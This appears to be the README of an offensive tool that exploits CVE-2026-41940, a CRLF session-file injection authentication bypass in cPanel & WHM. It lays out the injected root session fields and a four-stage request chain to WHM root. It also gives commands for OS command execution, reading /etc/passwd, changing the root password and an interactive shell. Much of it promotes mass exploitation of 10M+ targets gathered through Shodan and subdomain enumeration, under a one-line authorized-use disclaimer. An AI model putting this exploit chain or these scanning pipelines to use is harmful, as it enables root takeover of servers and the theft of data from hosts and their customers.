
cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets
CVE-2026-41940 β cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stage exploit chain Β· Interactive WHM Shell Β· TRUE STABLE for 10M+ targets Β· Zero memory usage Β· stdlib only
cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header β without any valid credentials.
For authorized penetration testing and bug bounty programs only.
This version is optimized for scanning 10,000,000+ targets with ZERO memory usage.
| Problem | Original Version | Fixed Version |
|---|---|---|
| Memory Usage | Loads all targets into RAM | Streams targets line-by-line (0 memory) |
| 10M Targets | OOM β Killed β | Completes successfully β |
| Resume | Not supported | --resume flag |
| Progress | No ETA | Real-time ETA + rate + stats |
| Results | Saved only at end | Saved every 60s (configurable) |
--resumesubfinder, httpx, shodanThe root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.
Normal flow:
POST /login/ β filter_sessiondata() β write session β auth check
Vulnerable flow:
POST /login/ β write session (CRLF payload injected) β filter_sessiondata() β auth check reads poisoned file
The Authorization: Basic value decodes to:
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Stage 0 β Canonical Hostname Discovery β
β GET /openid_connect/cpanelid β 307 β real hostname β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 1 β Mint Preauth Session β
β POST /login/?login_only=1 (wrong creds) β
β β 401 + whostmgrsession cookie β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 2 β CRLF Injection β
β GET / + Cookie: session + Authorization: Basic <payload> β
β cpsrvd writes CRLF fields into session file β
β β 307 Location: /cpsessXXXXXXXXXX/... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 3 β Propagate (do_token_denied gadget) β
β GET /scripts2/listaccts β
β Triggers rawβcache flush β injected fields become active β
β β 401 Token denied (expected) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 4 β Verify WHM Root Access β
β GET /cpsessXXXXXXXXXX/json-api/version β
β β 200 {"version":"11.x.x.x","result":1} = PWNED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
| Branch | Vulnerable | Patched |
|---|---|---|
| 110.x | β€ 11.110.0.96 | 11.110.0.97 |
| 118.x | β€ 11.118.0.62 | 11.118.0.63 |
| 126.x | β€ 11.126.0.53 | 11.126.0.54 |
| 132.x | β€ 11.132.0.28 | 11.132.0.29 |
| 134.x | β€ 11.134.0.19 | 11.134.0.20 |
| 136.x | β€ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help
No pip install required. Pure Python 3.8+ stdlib only.
# Single target β scan only
python3 cPanelSniper.py -u https://target.com:2087
# Single target β interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# Large target list β 10M+ targets (TRUE STABLE)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# Resume interrupted scan
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list
# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"
# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info
# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version
# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'
# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# subfinder β httpx β save to file β scan 10M+ targets
subfinder -d target.com -silent | \
httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
# From scope list - handle millions of domains
cat scope.txt | \
httpx -silent -ports 2087,2086 -threads 100 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
# Shodan results - massive scan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' > targets.txt
python3 cPanelSniper.py -l targets.txt -t 30 -o shodan_results.json
# stdin pipe - for small lists only (<100K)
echo "https://target.com:2087" | python3 cPanelSniper.py